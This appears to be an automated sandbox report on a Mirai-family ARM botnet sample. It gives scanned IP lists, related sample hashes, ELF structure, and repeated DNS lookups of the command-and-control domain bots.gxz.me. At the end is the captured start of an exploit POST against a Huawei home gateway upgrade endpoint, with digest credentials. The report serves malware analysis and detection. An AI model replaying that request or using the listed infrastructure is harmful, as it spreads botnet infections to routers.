            24863LINKdotNET-ASEGfalse
            25.1.68.49
            unknownUnited Kingdom
            7922COMCAST-7922USfalse
            157.250.108.25
            unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
            136.233.124.232
            unknownIndia
            55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
            197.58.18.251
            unknownEgypt
            8452TE-ASTE-ASEGfalse
            197.219.238.88
            unknownMozambique
            37342MOVITELMZfalse
            62.175.203.240
            unknownSpain
            43160ES-MDC-DATACENTERMalagaDataCenterESfalse
            205.176.15.143
            unknownUnited States
            8103STATE-OF-FLAUSfalse
            197.53.167.14
            unknownEgypt
            8452TE-ASTE-ASEGfalse
            83.236.204.116
            unknownGermany
            20676PLUSNETDEfalse
            121.29.40.35
            unknownChina
            4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
            85.253.133.19
            unknownEstonia
            13272STARMANEEfalse
            45.59.131.128
            unknownReserved
            30036MEDIACOM-ENTERPRISE-BUSINESSUSfalse
            120.35.44.19
            unknownChina
            4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
            164.220.55.199
            unknownUnited States
            5180DNIC-ASBLK-05120-05376USfalse
            76.130.174.243
            unknownUnited States
            7922COMCAST-7922USfalse
            47.46.176.174
            unknownUnited States
            20115CHARTER-20115USfalse
            157.176.29.126
            unknownUnited States
            22192SSHENETUSfalse
            169.126.196.125
            unknownUnited States
            37611AfrihostZAfalse
            204.126.245.76
            unknownUnited States
            40042SUFFOLK-COUNTY-GOVERNMENTUSfalse
            146.220.114.146
            unknownLuxembourg
            204590SWISS-ASCHfalse
            91.86.10.250
            unknownBelgium
            47377ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquiredfalse
            41.76.243.199
            unknownBotswana
            14988BTC-GATE1BWfalse
            138.176.152.92
            unknownUnited States
            721DNIC-ASBLK-00721-00726USfalse
            129.34.16.45
            unknownUnited States
            1747IBMWATSON-ASUSfalse
            197.175.135.240
            unknownSouth Africa
            37168CELL-CZAfalse
            190.33.178.5
            unknownPanama
            11556CableWirelessPanamaPAfalse
            162.9.162.159
            unknownUnited States
            35893ACPCAfalse
            197.206.51.6
            unknownAlgeria
            36947ALGTEL-ASDZfalse
            41.239.14.63
            unknownEgypt
            8452TE-ASTE-ASEGfalse
            41.19.159.156
            unknownSouth Africa
            29975VODACOM-ZAfalse
            197.43.98.175
            unknownEgypt
            8452TE-ASTE-ASEGfalse
            35.31.51.4
            unknownUnited States
            36375UMICH-AS-5USfalse
            157.74.27.77
            unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
            50.124.71.251
            unknownUnited States
            7011FRONTIER-AND-CITIZENSUSfalse
            24.59.115.84
            unknownUnited States
            11351TWC-11351-NORTHEASTUSfalse
            216.160.247.114
            unknownUnited States
            209CENTURYLINK-US-LEGACY-QWESTUSfalse
            145.76.80.243
            unknownNetherlands
            1103SURFNET-NLSURFnetTheNetherlandsNLfalse
            86.94.18.122
            unknownNetherlands
            1136KPNKPNNationalEUfalse
            68.118.78.80
            unknownUnited States
            20115CHARTER-20115USfalse
            154.113.229.130
            unknownNigeria
            37282MAINONENGfalse
            41.69.75.131
            unknownEgypt
            24835RAYA-ASEGfalse
            17.36.197.128
            unknownUnited States
            714APPLE-ENGINEERINGUSfalse
            123.199.26.184
            unknownKorea Republic of
            10066GAYANET-AS-KRLGHelloVisionCorpKRfalse
            41.98.223.119
            unknownAlgeria
            36947ALGTEL-ASDZfalse
            157.161.130.161
            unknownSwitzerland
            6772IMPNET-ASCHfalse
            197.75.183.144
            unknownSouth Africa
            16637MTNNS-ASZAfalse
            37.239.223.119
            unknownIraq
            50710EARTHLINK-ASIQfalse
            158.168.74.12
            unknownLuxembourg
            42848EC-ASLUfalse
            197.141.53.49
            unknownAlgeria
            36891ICOSNET-ASDZfalse
            91.45.253.207
            unknownGermany
            3320DTAGInternetserviceprovideroperationsDEfalse
            185.199.120.228
            unknownSerbia
            42603PARKING-SERVIS-ASRSfalse
            135.40.141.80
            unknownUnited States
            54614CIKTELECOM-CABLECAfalse
            8.149.255.173
            unknownSingapore
            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
            157.229.130.46
            unknownUnited States
            122UPMC-AS122USfalse
            157.37.76.74
            unknownIndia
            55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
            156.182.145.23
            unknownEgypt
            36992ETISALAT-MISREGfalse
            206.252.130.56
            unknownUnited States
            6650LOGICWORKS-ASUSfalse
            124.146.49.216
            unknownKorea Republic of
            17586NARATV-AS-KRLGHelloVisionCorpKRfalse
            197.128.22.138
            unknownMorocco
            6713IAM-ASMAfalse
            119.63.255.40
            unknownKorea Republic of
            17577GIGAPASS-AS-KRLGHelloVisionCorpKRfalse
            197.136.200.26
            unknownKenya
            36914KENET-ASKEfalse
            197.143.225.25
            unknownAlgeria
            36891ICOSNET-ASDZfalse
            151.183.240.211
            unknownSwitzerland
            16037TETRAPAK-ASSEfalse
            72.105.29.146
            unknownUnited States
            22394CELLCOUSfalse
            221.230.111.192
            unknownChina
            23650CHINANET-JS-AS-APASNumberforCHINANETjiangsuprovincebafalse
            41.87.149.94
            unknownMorocco
            36925ASMediMAfalse
            41.54.60.152
            unknownSouth Africa
            37168CELL-CZAfalse
            41.98.223.108
            unknownAlgeria
            36947ALGTEL-ASDZfalse
            80.244.29.176
            unknownCyprus
            35432CABLENET-ASCYfalse
            123.114.205.135
            unknownChina
            4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
            197.201.220.166
            unknownAlgeria
            36947ALGTEL-ASDZfalse
            154.205.102.11
            unknownSeychelles
            8100ASN-QUADRANET-GLOBALUSfalse
            197.162.72.111
            unknownEgypt
            24863LINKdotNET-ASEGfalse
            53.248.234.103
            unknownGermany
            31399DAIMLER-ASITIGNGlobalNetworkDEfalse
            137.91.147.103
            unknownUnited States
            33350APS---ARIZONA-PUBLIC-SERVICE-CORPORATIONUSfalse
            208.66.246.209
            unknownUnited States
            22408WKNETUSfalse
            157.152.98.139
            unknownUnited States
            719ELISA-ASHelsinkiFinlandEUfalse
            185.165.188.97
            unknownRussian Federation
            174COGENT-174USfalse
            67.157.113.131
            unknownUnited States
            1226CTA-42-AS1226USfalse
            160.110.28.32
            unknownUnited States
            715WOODYNET-2USfalse
            12.184.237.30
            unknownUnited States
            7018ATT-INTERNET4USfalse
            160.40.127.134
            unknownGreece
            47616CERTHGRfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            157.198.172.23kCyvYHV7F1.elfGet hashmaliciousMirai, MoobotBrowse
              39.61.254.102D0sF4Fm8ZaGet hashmaliciousMiraiBrowse
                41.179.133.1326ee3P3YPJ.elfGet hashmaliciousMiraiBrowse
                  huhu.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                    41.241.171.246wW8qsduT5E.elfGet hashmaliciousMirai, MoobotBrowse
                      197.58.252.106zxc.x86.elfGet hashmaliciousMiraiBrowse
                        XWU9DyfYTn.elfGet hashmaliciousMiraiBrowse
                          1l11IMuEaG.elfGet hashmaliciousMiraiBrowse
                            41.165.218.914B4IyzR032Get hashmaliciousMirai, MoobotBrowse
                              arm7.elfGet hashmaliciousMiraiBrowse
                                ECPX7wwZh6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                  8rqhnVgyewGet hashmaliciousMiraiBrowse
                                    LT3PftxFsPGet hashmaliciousMiraiBrowse
                                      uranium.armGet hashmaliciousMiraiBrowse
                                        34.35.26.222FoMYOJXhXA.elfGet hashmaliciousMiraiBrowse
                                          197.226.240.60A4P5opz2o6.elfGet hashmaliciousMiraiBrowse
                                            bk.arm4-20220928-0056.elfGet hashmaliciousMiraiBrowse
                                              chi.x86.elfGet hashmaliciousMiraiBrowse
                                                ZIB8Eu6SUWGet hashmaliciousMiraiBrowse
                                                  173.45.40.75QEMy2mlwhJ.elfGet hashmaliciousMiraiBrowse
                                                    197.13.57.2253nfyJwgmih.elfGet hashmaliciousMiraiBrowse
                                                      xtZOEWQ6sLGet hashmaliciousMiraiBrowse
                                                        47RMaTbdd4Get hashmaliciousMiraiBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          bots.gxz.me3LqyRhuLwv.elfGet hashmaliciousMiraiBrowse
                                                          • 141.98.7.15
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          SANNETRakutenMobileIncJPL6i3RnSvpp.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 157.214.67.142
                                                          BsQruPrJVe.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 157.196.2.107
                                                          1M7tN5L38L.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 157.209.165.121
                                                          bPnq1YMDrf.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 157.198.38.168
                                                          D8toi0qM9J.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 157.198.172.43
                                                          abkzsHZ00o.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 157.217.179.241
                                                          xc1gRf4odZ.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 157.198.38.165
                                                          Ixq2ypphWQ.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 157.220.202.176
                                                          om4SVF6n0I.elfGet hashmaliciousMiraiBrowse
                                                          • 157.213.238.2
                                                          URocnz2wNj.elfGet hashmaliciousUnknownBrowse
                                                          • 157.222.204.17
                                                          INDIANA-ASUShZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
                                                          • 149.162.152.120
                                                          bWT2t63tyx.elfGet hashmaliciousMiraiBrowse
                                                          • 149.166.36.78
                                                          mKBZo65Fcb.elfGet hashmaliciousMiraiBrowse
                                                          • 149.182.164.165
                                                          n8RoxsQ4om.elfGet hashmaliciousMiraiBrowse
                                                          • 149.188.71.198
                                                          6YyUQU3was.elfGet hashmaliciousMiraiBrowse
                                                          • 149.183.45.172
                                                          N5fJpUN6DR.elfGet hashmaliciousMiraiBrowse
                                                          • 149.191.16.57
                                                          GrFGTS35Dd.elfGet hashmaliciousMiraiBrowse
                                                          • 149.161.250.237
                                                          KlDqtLWXHA.elfGet hashmaliciousMiraiBrowse
                                                          • 149.191.16.39
                                                          GvNh44c0Un.elfGet hashmaliciousMiraiBrowse
                                                          • 156.56.236.204
                                                          byKLI4nzv2.elfGet hashmaliciousMiraiBrowse
                                                          • 156.56.101.204
                                                          PKTELECOM-AS-PKPakistanTelecomCompanyLimitedPKKlgUGKamBf.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          • 39.49.207.50
                                                          eId5V85KKM.elfGet hashmaliciousUnknownBrowse
                                                          • 182.191.179.77
                                                          rzfcEvDxkx.elfGet hashmaliciousUnknownBrowse
                                                          • 119.159.35.69
                                                          fdftMGtnix.elfGet hashmaliciousUnknownBrowse
                                                          • 39.49.232.21
                                                          wyZ1vPGwGw.elfGet hashmaliciousUnknownBrowse
                                                          • 39.57.246.214
                                                          M2Vf6ASl3g.elfGet hashmaliciousUnknownBrowse
                                                          • 39.53.88.83
                                                          bot.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 39.48.17.203
                                                          Xi102MnZby.elfGet hashmaliciousMiraiBrowse
                                                          • 39.56.208.73
                                                          hCNsvwoPS6.elfGet hashmaliciousUnknownBrowse
                                                          • 182.180.125.222
                                                          xfO72LuQ7K.elfGet hashmaliciousUnknownBrowse
                                                          • 39.32.71.150
                                                          KOGAKUIN-ASKOGAKUINUniversityJPy7wPhewB9V.elfGet hashmaliciousMiraiBrowse
                                                          • 133.80.190.78
                                                          Mu9xueyCfR.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 133.80.145.41
                                                          YKLjlQEZKY.elfGet hashmaliciousMiraiBrowse
                                                          • 133.84.38.238
                                                          pJNcZyhUh8.elfGet hashmaliciousMiraiBrowse
                                                          • 133.84.38.207
                                                          rLzRQBSFzM.elfGet hashmaliciousMiraiBrowse
                                                          • 133.84.116.106
                                                          fxkWlYHhRR.elfGet hashmaliciousMiraiBrowse
                                                          • 133.84.86.111
                                                          jhzIpYdY1u.elfGet hashmaliciousMiraiBrowse
                                                          • 133.80.121.90
                                                          hoFmhjV8HG.elfGet hashmaliciousMiraiBrowse
                                                          • 133.84.86.105
                                                          qz91XNGYhe.elfGet hashmaliciousMiraiBrowse
                                                          • 133.80.169.19
                                                          JHKp37MS78.elfGet hashmaliciousMiraiBrowse
                                                          • 133.84.240.171
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                          Entropy (8bit):6.0892649619537975
                                                          TrID:
                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                          File name:skt.arm6.elf
                                                          File size:78'476 bytes
                                                          MD5:ac0f7748a92af874c9b39799e0f77ee2
                                                          SHA1:ac9833859db52e9233fc3dd3b2d1186ebbcc5bcb
                                                          SHA256:30c4c8942474ab21b1d5624f68e707919ce95b4b9035f522b85a336b83e523cd
                                                          SHA512:865b71b88020ae0b9b583d35a4f5971f360c24a11ac646912b1687b79811aa0ac79b8be18e7dd53463303061c351da6e3d3d53a6ac1882bfdc1b64fd772f6993
                                                          SSDEEP:1536:IAnS5EhCID4mKPORfchmwwLgZ/XYhcPNldxiu6NLjPlmC9Lz:OMC9mKGRfchmwwLgZ/XYwF6N/lBZz
                                                          TLSH:27730A46F9818F02D4D622FAFB5E418933136BA8D3EE7102DD206F5467CA99F0E77612
                                                          File Content Preview:.ELF..............(.........4..../......4. ...(........p.!..........................................."..."..............."..."...".......2..............."..."..."..................Q.td..................................-...L..................@-.,@...0....S

                                                          ELF header

                                                          Class:ELF32
                                                          Data:2's complement, little endian
                                                          Version:1 (current)
                                                          Machine:ARM
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x8194
                                                          Flags:0x4000002
                                                          ELF Header Size:52
                                                          Program Header Offset:52
                                                          Program Header Size:32
                                                          Number of Program Headers:5
                                                          Section Header Offset:77756
                                                          Section Header Size:40
                                                          Number of Section Headers:18
                                                          Header String Table Index:17
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .initPROGBITS0x80d40xd40x100x00x6AX004
                                                          .textPROGBITS0x80f00xf00x1172c0x00x6AX0016
                                                          .finiPROGBITS0x1981c0x1181c0x100x00x6AX004
                                                          .rodataPROGBITS0x1982c0x1182c0x98c0x00x2A004
                                                          .ARM.extabPROGBITS0x1a1b80x121b80x180x00x2A004
                                                          .ARM.exidxARM_EXIDX0x1a1d00x121d00x1180x00x82AL204
                                                          .eh_framePROGBITS0x222e80x122e80x40x00x3WA004
                                                          .tbssNOBITS0x222ec0x122ec0x80x00x403WAT004
                                                          .init_arrayINIT_ARRAY0x222ec0x122ec0x40x00x3WA004
                                                          .fini_arrayFINI_ARRAY0x222f00x122f00x40x00x3WA004
                                                          .jcrPROGBITS0x222f40x122f40x40x00x3WA004
                                                          .gotPROGBITS0x222f80x122f80xa80x40x3WA004
                                                          .dataPROGBITS0x223a00x123a00x24c0x00x3WA004
                                                          .bssNOBITS0x225ec0x125ec0x2ff00x00x3WA004
                                                          .commentPROGBITS0x00x125ec0x9280x00x0001
                                                          .ARM.attributesARM_ATTRIBUTES0x00x12f140x160x00x0001
                                                          .shstrtabSTRTAB0x00x12f2a0x910x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          EXIDX0x121d00x1a1d00x1a1d00x1180x1184.42420x4R 0x4.ARM.exidx
                                                          LOAD0x00x80000x80000x122e80x122e86.05750x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                          LOAD0x122e80x222e80x222e80x3040x32f44.47130x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                                                          TLS0x122ec0x222ec0x222ec0x00x80.00000x4R 0x4.tbss
                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          May 28, 2024 09:55:44.477710009 CEST192.168.2.158.8.8.80xeeccStandard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:45.514645100 CEST192.168.2.158.8.8.80xe664Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:50.519774914 CEST192.168.2.158.8.8.80xe664Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:51.540709972 CEST192.168.2.158.8.8.80x490Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:53.169310093 CEST192.168.2.158.8.8.80x62fcStandard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:54.186614037 CEST192.168.2.158.8.8.80xb972Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:55.204679012 CEST192.168.2.158.8.8.80x92d5Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:00.209855080 CEST192.168.2.158.8.8.80x92d5Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:08.515491962 CEST192.168.2.158.8.8.80xb544Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:09.534606934 CEST192.168.2.158.8.8.80xa331Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:11.563647985 CEST192.168.2.158.8.8.80x5559Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:13.199625015 CEST192.168.2.158.8.8.80x8bd9Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:17.260210991 CEST192.168.2.158.8.8.80x6603Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:48.303230047 CEST192.168.2.158.8.8.80x23a2Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:53.308275938 CEST192.168.2.158.8.8.80x23a2Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:58.313383102 CEST192.168.2.158.8.8.80x23a2Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:59.331506968 CEST192.168.2.158.8.8.80xae2fStandard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:04.336494923 CEST192.168.2.158.8.8.80xae2fStandard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:05.355916977 CEST192.168.2.158.8.8.80xe30Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:06.374258041 CEST192.168.2.158.8.8.80x9e65Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:08.426182985 CEST192.168.2.158.8.8.80x24c6Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:09.807085037 CEST192.168.2.158.8.8.80x9febStandard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:12.011272907 CEST192.168.2.158.8.8.80xf0f1Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:13.639331102 CEST192.168.2.158.8.8.80x1428Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:14.657601118 CEST192.168.2.158.8.8.80x1c7aStandard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:15.675797939 CEST192.168.2.158.8.8.80x5c84Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:16.694715977 CEST192.168.2.158.8.8.80xfcd3Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:17.714679003 CEST192.168.2.158.8.8.80x6703Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:19.754199982 CEST192.168.2.158.8.8.80xae01Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:21.391180038 CEST192.168.2.158.8.8.80x5737Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:22.410278082 CEST192.168.2.158.8.8.80xe985Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:23.427892923 CEST192.168.2.158.8.8.80xab50Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:28.431123018 CEST192.168.2.158.8.8.80xab50Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:32.489629030 CEST192.168.2.158.8.8.80xa4b6Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:33.509661913 CEST192.168.2.158.8.8.80xcdd6Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:34.533128977 CEST192.168.2.158.8.8.80xceccStandard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:36.555335045 CEST192.168.2.158.8.8.80x3a6Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:37.573682070 CEST192.168.2.158.8.8.80x1564Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:42.578679085 CEST192.168.2.158.8.8.80x1564Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:43.595380068 CEST192.168.2.158.8.8.80x8066Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:44.617909908 CEST192.168.2.158.8.8.80x1f64Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:45.635664940 CEST192.168.2.158.8.8.80x8ef8Standard query (0)bots.gxz.meA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          May 28, 2024 09:55:44.486953020 CEST8.8.8.8192.168.2.150xeeccNo error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:50.528732061 CEST8.8.8.8192.168.2.150xe664No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:51.549699068 CEST8.8.8.8192.168.2.150x490No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:53.176112890 CEST8.8.8.8192.168.2.150x62fcNo error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:55:54.193690062 CEST8.8.8.8192.168.2.150xb972No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:00.217144966 CEST8.8.8.8192.168.2.150x92d5No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:08.522939920 CEST8.8.8.8192.168.2.150xb544No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:09.541620970 CEST8.8.8.8192.168.2.150xa331No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:11.570696115 CEST8.8.8.8192.168.2.150x5559No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:13.207429886 CEST8.8.8.8192.168.2.150x8bd9No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:17.269984961 CEST8.8.8.8192.168.2.150x6603No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:56:58.320326090 CEST8.8.8.8192.168.2.150x23a2No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:04.344757080 CEST8.8.8.8192.168.2.150xae2fNo error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:05.363284111 CEST8.8.8.8192.168.2.150xe30No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:06.392266989 CEST8.8.8.8192.168.2.150x9e65No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:08.669471979 CEST8.8.8.8192.168.2.150x24c6No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:09.971577883 CEST8.8.8.8192.168.2.150x9febNo error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:12.018342972 CEST8.8.8.8192.168.2.150xf0f1No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:13.646588087 CEST8.8.8.8192.168.2.150x1428No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:14.664736986 CEST8.8.8.8192.168.2.150x1c7aNo error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:15.683744907 CEST8.8.8.8192.168.2.150x5c84No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:16.701334000 CEST8.8.8.8192.168.2.150xfcd3No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:17.721676111 CEST8.8.8.8192.168.2.150x6703No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:19.761459112 CEST8.8.8.8192.168.2.150xae01No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:21.398272991 CEST8.8.8.8192.168.2.150x5737No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:22.417125940 CEST8.8.8.8192.168.2.150xe985No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:28.439497948 CEST8.8.8.8192.168.2.150xab50No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:32.496536970 CEST8.8.8.8192.168.2.150xa4b6No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:33.516575098 CEST8.8.8.8192.168.2.150xcdd6No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:34.540268898 CEST8.8.8.8192.168.2.150xceccNo error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:36.563271046 CEST8.8.8.8192.168.2.150x3a6No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:42.585009098 CEST8.8.8.8192.168.2.150x1564No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:43.603883982 CEST8.8.8.8192.168.2.150x8066No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          May 28, 2024 09:57:44.624979019 CEST8.8.8.8192.168.2.150x1f64No error (0)bots.gxz.me141.98.7.43A (IP address)IN (0x0001)false
                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          0192.168.2.153853863.252.52.13037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:44.506407022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
